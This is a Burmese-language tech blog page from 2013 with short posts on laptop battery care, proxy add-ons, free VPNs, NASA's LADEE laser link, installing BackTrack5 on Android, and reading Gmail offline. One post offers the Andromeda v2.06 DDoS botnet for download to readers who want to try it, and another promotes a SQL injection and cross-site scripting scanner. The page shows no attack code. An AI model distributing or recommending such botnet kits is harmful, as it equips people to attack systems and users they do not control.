9/30/2013

Laptop Battery ကုိၾကာရွည္ေစမယ့္ ေရွာင္ရန္/ေဆာင္ရန္နည္းလမ္းမ်ား

Laptop ေတြဆုိတာ ကြ်န္ေတာ္တုိ႕လူေတြရဲ႕ဘဝမွာ အေရးပါတဲ့အရာတစ္ခုျဖစ္ပါတယ္။ အမ်ားဆုံးသုံးတဲ့ေနရာကေတာ့ အင္တာနက္သုံးတဲ့ေနရာမွာျဖစ္ျပီးေတာ့ လုပ္ငန္းခြင္မွာေရာ
အသုံးျပဳၾကပါတယ္။ ဒါေပမယ့္ ခင္ဗ်ားအပါအဝင္လူတုိင္းနီးပါးဟာ လက္ေတာ့ Adapter ကုိ Plug ထုိးျပီးဆက္တုိက္သုံးေကာင္းသုံးေနပါလိမ့္မယ္။ ဒီလုိလုပ္တာကုိအခုခ်က္ခ်င္းရပ္လုိက္ပါ။

ခင္ဗ်ားအေနနဲ႔ လက္ေတာ့ Battery ကုိၾကာရွည္သက္တမ္းခံခ်င္ရင္ ဘက္ထရီ 100% မေရာက္ခင္ plug ျဖတ္ျပီးသုံးသင့္ပါတယ္။ ဒါက ခင္ဗ်ားရဲ႕ lithium-polymer battery ကုိသက္တမ္း ၾကာရွည္ေစမွာျဖစ္လုိ႔ပါပဲ။

Cadex Electronics က CEO ျဖစ္တဲ့ Buchmann ရဲေျပာၾကားခ်က္အရ လက္ေတာ့အသုံးျပဳရင္ ဘက္ထရီကုိ 80% ေရာက္တာနဲ႔ plug ျဖဳတ္ျပီး 40% ေရာက္တဲ့အထိပဲ အသုံးျပဳသင့္တယ္လုိ႔
အၾကဳံေပးပါတယ္။ ဒါက ခင္ဗ်ား ဘက္ထရီကုိ ပုံမွန္ထက္ ၆ ဆထိေတာင္ သက္တမ္းပုိမုိၾကာရွည္ေစမွာျဖစ္ပါတယ္။ အေၾကာင္းျပခ်က္ကေတာ့ lithium-polymer battery ေတြမွာရွိတဲ့ cellေတြဟာ Voltage level နဲ႔ပတ္သက္ေနလုိ႔ပါ။  ဘတ္ထရီက charge (အားသြင္းတာ) မ်ားေလေလ voltage level လည္းမ်ားေလေလပါပဲ။ Voltage မွာ cell ေတြမ်ားမ်ားစုေလေလ ဘက္ထရီမွာလည္း stress ေတြမ်ားေနမွာျဖစ္ပါတယ္။ ဝန္ပိသလုိေပါ့ဗ်ာ။ အဲဒီ stress က ဘက္ထရီရဲ႕ discharge cycle ကုိေလ်ာနည္းေစပါတယ္။ ဥပမာ ဘက္ထရီက 100% ထိအားသြင္းေနခ်ိန္မွာ discharge cycles က 300-500 ထိသာရွိျပီး 70% အားသြင္းခ်ိန္မွာ 1200-2000 ထိ discharge cycles ထိရရွိမွာျဖစ္ပါတယ္။

ဘက္ထရီဆုိတာမ်ဳိးကေတာ့ သဘာဝအရ စြမ္းေဆာင္ရည္ တျဖည္းျဖည္းက်ဆင္းစျမဲပါ။ ဒါကေတာ့ အမွန္ပါ။ လက္ေတာ့ ဝယ္ခါစက ဘက္ထရီသက္တမ္းက 7 နာရီဆုိပါစုိ႔၊ တစ္ႏွစ္ေလာက္အသုံးျပဳျပီးရင္
7 နာရီမရေတာ့ပါဘူး။ ဒါေပမယ့္ ဘက္ထရီက ပူေနတာမ်ားရင္ ဘက္ထရီသက္တမ္းကုိ ပုိျပီး တုိေစပါလိမ့္မယ္။ တအားပူေနရင္ cell ေတြထဲမွာ ကြဲအက္ႏုိင္တဲ့အထိေတာင္ျဖစ္ႏုိင္ပါတယ္။
အပူေတြတအားမ်ားတဲ့အခါ ဘက္ထရီက အားသြင္းရင္ ျမန္ျမန္ဆန္ဆန္ အားမဝင္ေတာ့တဲ့အထိေတာင္ ေတြ႔ရွိရတယ္လုိ႔ iFixit ရဲ႕ Kyle Wiens ကေျပာပါတယ္။

Buchmann အၾကဳံေပးတာကေတာ့ ဘက္ထရီသက္တမ္းကုိ တတ္ႏုိင္သမွ် ၾကာရွည္ေစခ်င္ရင္ လက္ေတာ့သုံးရင္ ဘက္ထရီကုိ 80% ကေန 40% ၾကားမွာပဲအသုံးျပဳပါလုိ႔ဆုိပါတယ္။ ခုခ်ိန္ထိေတာ့
Windows ေရာ Mac ေရာ လက္ေတာ့ဘက္ထရီ 80%, 40% ေရာက္ရင္ user ေတြကုိ alert ေပးတဲ့ စနစ္ကုိမထည့္ထားေသးပါဘူး။ ဒီေတာ့ ခင္ဗ်ားအေနနဲ႔ ဘက္ထရီ 40% ကေန 80% ကုိေရာက္ဖုိ႔ 
ၾကာတဲ့အခ်ိန္ ဒါမွမဟုတ္ 80% ကေန 40% ေရာက္တဲ့အခ်ိန္ကုိ မွတ္ထားျပီး ပ်မ္းမ်ွၾကာခ်ိန္ကုိမွတ္ထားပါ။ ျပီးရင္ Timer တစ္ခုထားျပီး ဘက္ထရီကုိ plug/unplug လုပ္ပါလုိ႔အၾကဳံေပးထားပါတယ္။ 
တကယ္လုိ႔ ခင္ဗ်ားအေနနဲ႔ ခရီးရွည္တစ္ခုသြားရမယ္ဆုိရင္ေတာ့ 100% အထိအားသြင္းေပါ့ေလ။ ဒါက ခင္ဗ်ားဘက္ထရီသက္တမ္းကုိ ၾကာရွည္ေစမယ့္ နည္းလမ္းေကာင္းတစ္ခုျဖစ္ျပီးေတာ့ ဒါဟာ ထုိက္တန္ပါတယ္။

ခုတေလာ ကြ်န္ေတာ္ဆီမွာ ကြန္နက္ရွင္က တက္လုိက္က်လုိက္ျဖစ္ေနတာ။ အဲဒါနဲ႔ ကြန္ေကာင္းတုန္းေလး စိတ္ဝင္စားစ၊ရာ ေဆာင္းပါးေတြကုိလုိက္ၾကည့္ရင္း save ျပီး Offline မွာျပန္ၾကည့္ရင္း ဒီလုိေဆာင္းပါးပုံစံေရးလုိက္တာ။ ဘာေျပာေျပာ ကြ်န္ေတာ္ရဲ႕ပုိ႔စ္ေလးက စိတ္ဝင္စားစရာေကာင္းျပီး သတိထားစရာအသိတစ္ခုတုိးသြားမယ္ဆုိရင္ ကြ်န္ေတာ္ၾကိဳးစားျပီး ေရးေပးရက်ဳိးနပ္မွာပါ။


Ref: wired.com
Read more »

Top 5 Firefox Add-on for Proxy

Firefox ဆုိတာကေတာ့ ကြ်န္ေတာ္တုိ႔အတြက္ေတာ့ Friendly ျဖစ္ျပီး Default Browser တစ္ခုလုိ႔ေတာင္ ထင္မွတ္မိပါတယ္။ :D သူရဲ႕ Security ေတြကလည္းျမင့္ပါတယ္။ ဒီေတာ့ Firefox ေလးသုံးျပီး Add-on ေတြျဖည့္စြက္လုိက္ရင္ အင္တာနက္မွာ Hide IP လုိေဆာ့ဝဲလ္ေတြသုံးစရာမလုိပဲ Anonymously သြားလုိ႔ရပါတယ္။ ဒါကေတာ့ hackingsec.in မွာေရးထားတာေလးကုိ ျပန္ရွယ္လုိက္ပါတယ္။ 

ဒီေကာင္ကေတာ့ UK based proxy addon ပါ။ သုံးရတာလည္း လြယ္ပါတယ္။ 

ဒီေကာင္ကလည္း အေကာင္းဆုံး addon တစ္ခုပါပဲ။ သူက IP address leakage, cookie leakage စာတာေတြကုိကာကြယ္ေပးတယ္လုိ႔ဆုိပါတယ္။ ဟုတ္မဟုတ္ေတာ့ ကြ်န္ေတာ္လည္း မသိ။ :D

 သူကေတာ့  Anonymous Proxy လုိမကပါဘူး။ Content Filtering ေတြကုိ bypass လုပ္လုိ႔ရပါသတဲ့။

သူကလည္း user friendly ျဖစ္တဲ့ addon ေလးျဖစ္ပါတယ္။ ေနာက္ auto proxy rotating function နဲ႔အျခားေသာ feature ေတြပါဝင္ပါတယ္။

မေျပာခ်င္ေတာ့ပါဘူး။ ဟီး

Addon ေတြအားလုံးက Mozilla ရဲ႕ Officially ထုတ္ထားတဲ့ addon ေတြမုိ႔ စိတ္ခ်လက္ခ်သုံးႏုိင္ပါတယ္။ ဒီထဲက အားလုံးလည္း သုံးစရာမလုိပါဘူး။ ကုိယ္နဲ႔အဆင္ေျပရာတစ္ခုကုိသုံးရင္ ရပါျပီ။ အကုန္သာ install လုပ္ေနရင္ Firefox ကေလးေနပါလိမ့္မယ္။ ကြ်န္ေတာ္ကေတာ့ Anon X တစ္ခုပဲသုံးပါတယ္။ သုံးရတာလည္းလြယ္ပါတယ္။ link ကေနသြား Add to Firefox ကေန install လုပ္ျပီး Firefox ကုိ Restart ခ်လုိက္ရင္ရပါျပီ။ မသုံးခ်င္ရင္ Tool>Addon ကေန Disable/Remove လုပ္လုိ႔ရပါတယ္။ 
Read more »

အေကာင္းဆုံး Free VPN Service 5 ခု

VPN ဆုိတာကေတာ့ Virtual Private Network ရဲ႕အတုိေကာက္စာလုံးပါ။ လုိရင္းတုိရွင္းေျပာရရင္ အင္တာနက္ကေန ကုိယ္ရဲ႕ LAN Network ကုိ Access ယူျပီး အင္တာနက္သုံးတဲ့သေဘာပါပဲ။ ဥပမာ မိမိက ေလဆိပ္ ဒါမွမဟုတ္ တစ္ေနရာရာကုိေရာက္ေနမယ္။ ဒါေပမယ့္ သူမ်ား Public Wifi Zone ေတြမွာ ကုိယ္ရဲ႕ paypal account ကုိ login မလုပ္ခ်င္ဘူး။ အဲလုိအေျခေနမွာ ကုိယ္ရဲ႕ LAN Network ကုိ Over Internet ကေန Access ရယူလုိတဲ့အခါ အသုံးျပဳရပါတယ္။ သူမ်ားႏုိင္ငံေတြမွာေတာ့ Service ေပးျပီးရယူၾကပါတယ္။ VPN ကုိသုံးရင္ Connection ေတာ့ နည္းနည္းေလးသြားပါမယ္။ သူမ်ားႏုိင္ငံမွာေတာ့ ဘာမွမသိသာပါဘူး။ ကုိယ္ေတြကေတာ့ မရတာမ်ားတယ္။ ဒါေပမယ့္ အနည္းဆုံးေတာ့ VPN နဲ႔ခ်ိတ္လုိက္ရင္ IP Change သြားပါတယ္။ ဒီေတာ့ အနည္းဆုံး အင္တာနက္မွာ မိမိ IP Hide ျပီးသုံးႏုိင္ပါလိမ့္မယ္။ ဒီေတာ့ VPN ေတြသုံးခ်င္ရင္ ေအာက္မွာ အေကာင္းဆုံးလုိ႔ဆုိထားတဲ့ free vpn service ေတြကုိေဖာ္ျပလုိက္ပါတယ္။ စမ္းၾကည့္ေပါ့ဗ်ာ။

HotSpot Shield Free က နာမည္ၾကီး free vpn service တစ္ခုျဖစ္ပါတယ္။ free version မွာေတာ့ စိတ္မသက္စရာ ေၾကာ္ျငာေတြေတာ့ရွိပါမယ္။ Security အတြက္တစ္ခုတည္းနဲ႔တင္ သုံးသင့္တဲ့ vpn တစ္ခုျဖစ္ေလေတာ့ မဆုိးဘူးဆုိရမွာပါပဲ။ သူ support လုပ္တဲ့ platform ေတြကေတာ့ စုံပါတယ္။ Windows, Mac, iOS, Android ေတြကုိ support လုပ္ပါတယ္။


Private Tunnel ကုိအသုံးျပဳျပီး ကြ်န္ေတာ္တုိ႔အေနနဲ႔ US, UK, Switzerland, Canada, နဲ႔ Amsterdam က vpn server ေတြကုိခ်ိတ္ျပီး သုံးႏုိင္မွာျဖစ္ပါတယ္။ ဒီေကာင္ကလည္း
Windows, Mac, iOS, Android platform ေတြကုိ support လုပ္ေပးပါတယ္။


 OkayFreedom VPN ကေတာ့ privacy ကုိဂရုစုိက္ေပးတဲ့ vpn site ျဖစ္တဲ့အတြက္ အင္တာနက္သုံးတဲ့အခ်ိန္မွာ လုံျခဳံမွဳကုိရရွိေစမွာပါ။ သူလည္း American, British, French, German, or Swiss ဆာဗာေတြကုိ ေရြးခ်ယ္စရာရွိပါမယ္။ စိတ္မေကာင္းစရာကေတာ့ တစ္လကုိ Banwidth limit 500 MB ကန္႔သတ္ထားတာပါပဲ။ ဒါေပမယ့္လည္း ကြ်န္ေတာ္တုိ႔အေနနဲ႔ အျမဲတမ္း vpn server ကုိ connect 
မလုပ္ဘူးဆုိရင္ အဆင္ေျပပါတယ္။ ဒီေကာင္ကေတာ့ Windows တစ္ခုတည္းကုိပဲ support လုပ္ပါတယ္။


CyberGhost ကေတာ့ နာမည္ၾကီးပါ။ ကြ်န္ေတာ္ဒီေကာင္အေၾကာင္းအရင္က ပုိ႔စ္ဖူးပါတယ္။ သူကေတာ့ တစ္လကုိ Bandwidth Limit က 1950 GB ေတာင္ေပးတာဆုိေတာ့ ေတာ္ေတာ္ေလး မုိက္တယ္
ဆုိရမွာပါ။ သူဆီမွာ ဆာဗာ 200 အျပင္ location ေပါင္း 19 ခုကေနသုံးႏုိင္မွာျဖစ္ပါတယ္။ သူလည္း Windows တစ္ခုတည္းကုိသာ support လုပ္ပါတယ္။


JustFreeVPN ကုိေတာ့ US, UK, နဲ႕Canada, ဆာဗာေတြနဲ႔အလုပ္လုပ္ပါတယ္။ အျခားေရြးစရာမရွိပါဘူး။ ဒါေပမယ့္ သူက PPTP Protocol ကုိအသုံးျပဳထားတဲ့အတြက္ ေဒတာစီးဆင္းမွဳေတြကုိ
encrypt လုပ္ေပးမွာျဖစ္ပါတယ္။ 


Free VPN ေတြသုံးရတာမုိက္ပါတယ္။တကယ္လုိ႔ သင္က privacy ကုိလုိခ်င္တယ္ဆုိရင္ေပါ့ေလ။ သာမန္အသုံးျပဳမယ့္သူေတြအေနနဲ႔ မသုံးေစခ်င္ပါဘူး။ ဘာလုိ႔လဲဆုိေတာ့
ကြန္နက္ရွင္က နည္းနည္းေလးသြားမွာကုိး။ သူမ်ားဆီမွာ မသိသာေပမယ့္ ကုိယ္ေတြဆီမွာက လိပ္ထက္ေတာင္ေႏွးသြားမွာေလ။ မျဖစ္မေနသုံးရမယ့္ သူေတြအတြက္ကေတာ့ အေပၚက vpn service
ေတြက ေက်နပ္စရာေကာင္းမွာပါ။ ကြ်န္ေတာ္ကေတာ့ CyberGhost, HotSpot Shield ေတြကုိ Recommended ေပးပါတယ္။ အျခားဟာေတြက Configuration လုပ္ရတာ လက္ေပါက္ကပ္လုိ႔ပါ။
ကြ်န္ေတာ္လည္း ေလေပါ့တာမ်ားသြားျပီ။ ဒီေလာက္ဆုိရင္ ရျပီထင္ပါတယ္။ :D

Ref: makeuseof






Read more »

9/28/2013

လကမၻာကုိ ပတ္မယ့္ နာဆာရဲ႕ ျဂိဳလ္တုမွာ Broadband Access ပါရွိမယ္

ကြ်န္ေတာ္က ဟုိစပ္စပ္ဒီစပ္စပ္ စိတ္ဝင္စားတဲ့ေကာင္ျဖစ္ေတာ့ ဒီပုိ႔စ္ေရးလုိက္တာ ဟီး။ IT နဲ႔ တုိက္ရုိက္မပတ္သက္ေပမယ့္ Broadand ပါတာနဲ႔ ဗဟုသုတ အျဖစ္ဖတ္ၾကည့္ေပါ့ဗ်ာ။ နာဆာဆုိတာေတာ့ အာကာသနဲ႔ပတ္သက္ရင္ အားလုံးသိျပီးသားျဖစ္မွာပါ။ ဟုတ္ပါတယ္။ ခုဆုိရင္ နာဆာက လကမၻာဆီကုိ 
ပတ္မယ့္ Lunar Atmosphere and Dust Environment Explorer (LADEE) လုိ႔ေခၚတဲ့ Orbiter ဆီမွာ Broadband Capabilites ပါတစ္ခါတည္းသယ္ေဆာင္သြားမယ္လုိ႔ဆုိပါတယ္။ on board technology လုိ႔ေခၚတဲ့ two-way laser communication စနစ္နဲ႔ ကမၻာနဲ႕ လကမၻာဆီကုိ ဆက္သြယ္ေပးမွာပါ။

နာဆာကေတာ့ ဒီနည္းပညာကုိ အာကာသထဲမွာ ေသးငယ္ေပါ့ပါးတဲ့ Telescope ကုိအသုံးျပဳျပီး ကမၻာနဲ႔ဆက္သြယ္ေပးမွာျဖစ္ပါတယ္။ အဲဒီ telescope မွာပါတဲ့ LCD ကေန စကၠန္႔တုိင္းမွာ millions နဲ႔ခ်ီတဲ့ ေလဆာေရာင္ျခည္ေတြနဲ႔ ကမၻာက Station သုံးခုဆီကုိပုိ႔လြတ္ေပးမွာျဖစ္ပါတယ္။ အဲဒီ Station တစ္ခုဆီက လုံးဝတိမ္ကင္းတဲ့ေနရာမွာေရြးခ်ယ္ထားပါတယ္။

ဆုိးဝါးတဲ့ ရာသီဥတုက laser signal ေတြကုိ အေႏွာက္အယွက္ျဖစ္ေစပါတယ္။ ဒါေၾကာင့္ အဲဒီ station သုံးခုတည္ရွိမယ့္ ေနရာက တစ္ႏွစ္ပတ္လုံးလုံးဝတိမ္ကင္းစင္ေနဖုိ႔လုိအပ္ပါတယ္။ ဒါေၾကာင့္လည္း Station ေတြက  New Mexico, California နဲ႕ Spain မွာတည္ေဆာက္ထားတာ အံ့ၾသစရာေတာ့မရွိပါဘူး။ ဘာေၾကာင့္လဲဆုိေတာ့ အဲဒီေနရာသုံးခုလုံးက sunny climates လုိ႔လူသိမ်ားတာကုိး။ sunny climates ဆုိတာေတာ့ အျခားေနရာေတြထက္စာရင္ တစ္ႏွစ္ပတ္လုံး တိမ္ကင္းစင္တဲ့ ေနရာပါပဲ။
ဒီလုိနည္းနဲ႔ ကမၻာမွာရွိတဲ့ ground station ကေန Signal ေတြလက္ခံရရွိမွာျဖစ္ပါတယ္။ 

ပညာရွင္ေတြေျပာတာကေတာ့ LADEE မွာပါမယ့္ ေလဆာေရာင္ျခည္ဟာ အနီေအာက္ေရာင္ျခည္နီးပါးရွိတဲ့ wavelength ကုိအသုံးျပဳထားပါသတဲ့။ ဒီနည္းပညာကုိေတာ့
Lunar Laser Communication Demonstration လုိ႔ေခၚပါတယ္။ LLCD အေနနဲ႕ ကမၻာကုိ 622 megabits per second အျမန္ႏွဳန္းနဲ႕ signal ေတြကုိေပးပုိ႔မွာျဖစ္ပါတယ္။ ဒါက လက္ရွိအသုံးျပဳေနတဲ့ အျမန္ႏွုန္းထက္ ၆ ဆျမန္တာပါ။

ဒီနည္းပညာက လကမၻာဆီက သတင္းအခ်က္အလက္ေတြကုိ စကၠန္႔ပုိင္းအတြင္း ကမၻာကေနလက္ခံရရွိေစမွာျဖစ္ပါတယ္။ ေျပာရမယ္ဆုိရင္ ဒါက ၾကီးမားတဲ့ တုိးတက္မွဳတစ္ခုပါပဲ။ 1968 ခုႏွစ္တုန္းကဆုိရင္ ပုံတစ္ပုံ လကမၻာကေန ကမၻာဆီကုိေရာက္ဖုိ႔  ရက္ေတာ္ေတာ္မ်ားမ်ား ၾကာခဲ့တာျဖစ္ပါတယ္။

ေျပာရရင္ သူမ်ားေတြက လကမၻာေတြထိေတာင္ Broadband Access ရေအာင္လုပ္ေတာ့မယ္ဆုိေတာ့ လကမၻာကေန အင္တာနက္ေတြသုံးလုိ႔ ရေတာ့မယ္သေဘာလား
မသိဘူး။ ကုိယ္ေတြကေတာ့ 3G မေျပာနဲ႔ ခုတေလာ 20 KB/s နဲ႔စုတ္ခ်ာေနတဲ့ Connection ကုိနပ္မွန္ေအာင္မသုံးႏုိင္တဲ့ဘြ။ :( :( ေျပာေတာ့ပါဘူးေလ။ :P
ေနာက္စိတ္ကူးေပါက္ရင္ အဂၤါျဂိဳလ္နဲ႔ပက္သတ္တဲ့စိတ္ဝင္စားစရာပုိ႔စ္ေတြေရးရင္ေကာင္းမလားလုိ႔။ ဟီး။ ေရးေစခ်င္ရင္ မန္းၾကေနာ္။ :D

Ref: Techbeat

Read more »

9/27/2013

Andromeda v2.06 (Botnet)

http://viprasys.org/xfs/image/direct/5V0E64vye3/2.jpg 
Andromeda Botnet ကေတာ့ နည္းနည္း လန္းတယ္ဗ်.. interface ကလည္း ေတာ္ေတာ္ေလး အထာက်ပါတယ္။ Botnet ပုိင္းေလ့လာေနသူမ်ား.. မသုံးဖူးေသးလုိ ့သုံးဖူးခ်င္တယ္ဆုိတဲ့ ညီကိုမ်ားအတြက္ တင္ေပးလုိက္ပါတယ္.. DDOS Botnet ပါ..
ကဲၾကိုက္ရာလင့္မ်ား ေဒါင္းေလာ့ရယူနုိင္ပါျပီ။
Read more »

9/26/2013

WebCruiser Web Vulnerability Scanner


SQL Injection လုိမ်ဳိး web vulnerability scanner အမ်ဳိးအစားတစ္ခုျဖစ္ပါတယ္။ သူလုပ္ႏုိင္တာေတြ ေအာက္မွာတစ္ခ်က္ၾကည့္လုိက္ပါ။ စမ္းၾကည့္မယ္ဆုိရင္ ေဒါင္းလုိက္ပါ။ CyberW0rm ကေန မ,လာပါတယ္။


Key Features:
* Crawler(Site Directories And Files);
* Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.;
* SQL Injection Scanner;
* SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept);
* SQL Injection for SQL Server: PlainText/Union/Blind Injection;
* SQL Injection for MySQL: PlainText/Union/Blind Injection;
* SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection;
* SQL Injection for DB2: Union/Blind Injection;
* SQL Injection for Access: Union/Blind Injection;
* Post Data Resend;
* Cross Site Scripting Scanner and POC;
* XPath Injection Scanner and POC;
* Auto Get Cookie From Web Browser For Authentication;
* Report Output.



Read more »

My Android Apk

ဒါကေတာ့ ကြ်န္ေတာ္ရဲ႕ဆုိဒ္ကုိ offline မွာပါဖတ္လုိ႔ရမယ့္ apk ေလးျဖစ္ပါတယ္။ လုပ္ျဖစ္တယ္ဆုိတာလည္း apk လုပ္နည္းကုိသိခ်င္တာရယ္ ကြ်န္ေတာ္ကုိယ္တုိင္ ကုိယ့္ဆုိဒ္ဆီက post ေတြကုိ အင္တာနက္မရွိခ်ိန္မွာျပန္ဖတ္ႏုိင္ေအာင္လုိ႔ စမ္းလုပ္ရင္းနဲ႔ ျပန္ရွယ္လုိက္တာ။ ကြ်န္ေတာ္ဆုိဒ္ကုိ အျမဲလာေနက်သူေတြအေနနဲ႔ လုိခ်င္တယ္ဆုိရင္ ယူထားလုိက္ေပါ့ဗ်ာ။ အဆင္ေျပၾကပါေစ။ 

Read more »

Backtrack5 Port using CHROOT

BT ကုိ Android မွာသြင္းနည္းေလးပါ။ ကြ်န္ေတာ္ေဘာ္ဒါေရးထားတာၾကာပါျပီ။ ဟုိး လြန္ခဲ့တဲ့ 5 လေလာက္ကတည္းကထင္တယ္။ ဒီေန႔မွ ကြ်န္ေတာ္လည္းစိတ္ကူးေပါက္လာလုိ႔ သူ႕ကုိပူဆာျပီးျပန္ရွာခုိင္းတာပါ။ သူ test လုပ္တာေတာ့ ေအာင္ျမင္ခဲ့ပါတယ္တဲ့။ ကြ်န္ေတာ္ကေတာ့ မစမ္းသပ္ေသးလုိ႔ တစ္ခုခုအဆင္မေျပျဖစ္ခဲ့ရင္ အၾကဳံမေပးႏုိင္ရင္ နာလည္ေပးပါ။ မူရင္းလင့္ေတြေရာ ျပန္ညြန္းထားပါတယ္။ ကလိခ်င္သူမ်ားစမ္းၾကည့္ေပါ့ေနာ္။

ယခုနည္းလမ္းဟာ သင့္ OS,romနဲ႔ system ေတြကို ေျပာင္းလဲ/ျပဳျပင္ျခင္းမလိုပါဘူး။ သင့္ OS ကိုထိခိုက္ျခင္း ခ်ိဳးဖ်က္ျခင္း မရွိ ေစရပဲ Virtual machine ကဲ႔သို႔ အလုပ္လုပ္မွာပဲျဖစ္ပါတယ္။

[ လိုအပ္ခ်က္မ်ား]
. ဖုန္းကုိ Root လုပ္ထားရပါမယ္,Busybox သြင္းထားရပါမယ္ ။
. sdcard မွာ 3.3G အလြတ္ ရွိရပါမယ္။
. command ေပးဖို႔ Emulator ရွိရပါမယ္။မရွိရင္လဲ ဒီကေဒါင္းပါ (https:// play.google.com /store/apps/ details?id=jackpal.androidterm )
. android vnc ေဒါင္းလိုက္ပါ (https:// play.google.com /store/apps/ android.androidVNC )
. ကြန္ပ်ဴတာမွာ 7zip ေျဖဖို႔ SW ရွာေဒါင္းလိုက္ပါ။

[ bt အတြက္ေဒါင္းပါမယ္ ]
. Bcktrack5 CWM flashable zip with script (https://www.dropbox.com/s/ v04015wj6vjmwmk/Backtrack5_cwm_script-signed. zip )
. bt.img (splitted into 10 7-zip files) 
. bt.7z.001 ( http:// doomlord.sylvester2007.com/ bt5android/bt. 7z.001 )
. bt.7z.002 ( http:// doomlord.sylvester2007.com/ bt5android/bt. 7z.002 )
. bt.7z.003 ( http:// doomlord.sylvester2007.com/ bt5android/bt. 7z.003 )
. bt.7z.004 ( http:// doomlord.sylvester2007.com/ bt5android/bt. 7z.004 )
. bt.7z.005 ( http:// doomlord.sylvester2007.com/ bt5android/bt. 7z.005 )
. bt.7z.006 ( http:// doomlord.sylvester2007.com/ bt5android/bt. 7z.006 )
. bt.7z.007 ( http:// doomlord.sylvester2007.com/ bt5android/bt. 7z.007 )
. bt.7z.008 ( http:// doomlord.sylvester2007.com/ bt5android/bt. 7z.008 )
. bt.7z.009 ( http:// doomlord.sylvester2007.com/ bt5android/bt. 7z.009 )
. bt.7z.0010 ( http:// doomlord.sylvester2007.com/ bt5android/bt.7z.0010)

[ Video Installation Guide ]
. http://www.youtube/. com / watch?v=j1pN5bEidaM

[ စမယ္ ရယ္ဒီေနာ္  ]
၁။ အကုန္ေဒါင္းလိုက္ပါ ( bt.img နဲ႔ cwm zip အပါဝင္ ) ,အားလုံးကုိ temporary folder ထဲ ခနထည့္ထားပါ။
၂။ ဖုန္းထဲက sdcard ရဲ႔ ေနာက္ဆုံးအဆင့္ ( root of sdcard ) အရွင္းဆုံးေျပာရရင္ file manager ထဲကေန ေနာက္ဆုံးမထြက္ခင္အဆင့္ေပါ့ အဲ႔ မွာ bt နာမည္နဲ႔ folder ဖိုဒါ ေဆာက္လိုက္ပါ ။
၃။ bt.7z ဖိုင္ေတနဲ႔ bt.img ဖိုင္ေတကို Extract လုပ္ျပီး အကုန္လုံးကုိ ခုန ေဆာက္ခဲ႔တဲ႔ bt ဖိုဒါထဲ ကူထည့္လိုက္ပါ။
၄။ Backtrack5_ cwm_script-singed. zip ဖိုင္ကို ခုန bt ဖိုဒါ ေနရာမွာတူတူ ထားျပီး recovery အတြက္ Flash လုပ္ထားပါ။
၅။ reboot လုပ္ျပီး bt ဖိုဒါထဲမွ ေအာက္ပါ ဖိုင္ေတြရွိမရွိေသခ်ာျပန္စစ္ပါ -
bt
bt.img
installbt.sh
startbt
stopbt
၆။ အိုကီ ျပီ ဆိုရင္ စ ကလိရေအာင္ :P။ terminal ဖြင့္ျပီး ဒါေလးေတရိုက္ လိုက္ပါ -
su
cd/sdcard/bt
sh install.sh
startbt
bt
ui
၇။ ျပီးရင္ home keyနဲ႔ ျပန္ထြက္ျပီး VNC viewer ဖြင့္ ျပီး set up ကို ဒီလိုေလးလုပ္ပါမယ္-
pass : 12345678
Address : 127.0.0.1
port : 5901
color : 24-bit
၈။ အိုေခ Connect ေလးကုိ နွိပ္ပါမယ္ ။ဒန္ တန္႔ဒန္  .. ေဟာ ခုဆိုရင္ BT5 GUI ဟာ VNC မွာ စတင္ ေျပးေနပါပီ .. ( ဘီးပါတပ္ေပးမွာ .. ငိငိ ) ။ menukey နွိပ္ျပီး input mode မွာ touchpad လုပ္ေပးပါ ။ ဒါဆို screen ကို လက္ေတာ့လို ေမာ္နီတာ လို သုံးလို႔ရပါျပီ ။
၉။ ပိတ္ခ်င္တယ္ဆိုရင္ menukey က disconnect လုပ္ပါ ။ျပီးရင္ terminal ကိုသြားျပီး-
killui
exit ရိုက္လိုက္ပါ ။
၁၀။ အခုဆိုရင္ သင္ဟာ btကေနျပန္ထြက္သြားျပီး သာမန္ #shell ေပၚျပန္ေရာက္ေနပါျပီ ။ -
stopbt ရိုက္ျပီး မထြက္မခ်င္း exit သာ ရိုက္ပါေတာ့။
၁၁။ ခုဆိုရင္ အားလုံးလြတ္ျပီက်ြက္ျပီ ထြက္ျပီးျပီ ျဖစ္သြားပါျပီ ။ reboot ေလးျပန္လုပ္ေပးပါေနာ့။


[ အိုခီ installed တခါ လုပ္ျပီးသြားျပီ ဆိုရင္ေတာ့ ေနာက္ အသုံးျပဳမယ္ ဝင္မယ္ဆိုရင္ -
su
cd/sdcard/bt
startbt
bt
ui ရိုက္ျပီး စနိုင္ပါျပီ။

မွတ္ခ်က္ ။ ယခုတင္ေပးေသာ အေၾကာင္းရာမ်ားနွင့္ ဖိုင္မ်ားအားလုံးအားလုံးကုိ xda developer ဆိုက္မွ မလာပါေၾကာင္းနွင့္ က်ေနာ္တို႔ နည္းပညာေလာကကို အေထာက္ပံ့ျဖစ္ေစရန္သာရည္ရြယ္ပါသည္ ။

[Video Installation Guide]



Written By Liquid Foxer
Read more »

How to Access Gmail "Offline"


အေၾကာင္းအမ်ဳိးမ်ဳိးေၾကာင့္ မိမိ Gmail ကုိ အင္တာနက္မရွိတဲ့အခါ offline ကေနဖတ္ဖုိ႔လုိအပ္ခဲ့ရင္ ကြ်န္ေတာ္တုိ႔ ဒီနည္းနဲ႔ လုပ္ၾကည့္မယ္ဗ်ာ။ နည္းေတြကေတာ့ အမ်ားၾကီးရွိပါတယ္။ လြယ္လြယ္နည္းကုိပဲေျပာျပပါေတာ့မယ္။ အဓိကက အဆင္ေျပဖုိ႔။ 

Using Gmail Offline Extension (Google Chrome)


ဒီေကာင္နဲ႔ဆုိရင္လည္း ရပါတယ္။ Google Chrome browser ကုိေတာ့ သုံးေပးရမွာျဖစ္ပါတယ္။ Gmail Offline extension ကုိသုံးဖုိ႔ https://chrome.google.com/webstore/detail/gmail-offline/ejidjjhkpiempkbhmpbfngldlkglhimk ကုိသြားျပီး သြင္းႏုိင္ပါတယ္။ အသုံးျပဳပုံ အေသးစိတ္ကုိေတာ့ မေျပာေတာ့ပါဘူး။ 

Using Mozilla Thunderbird

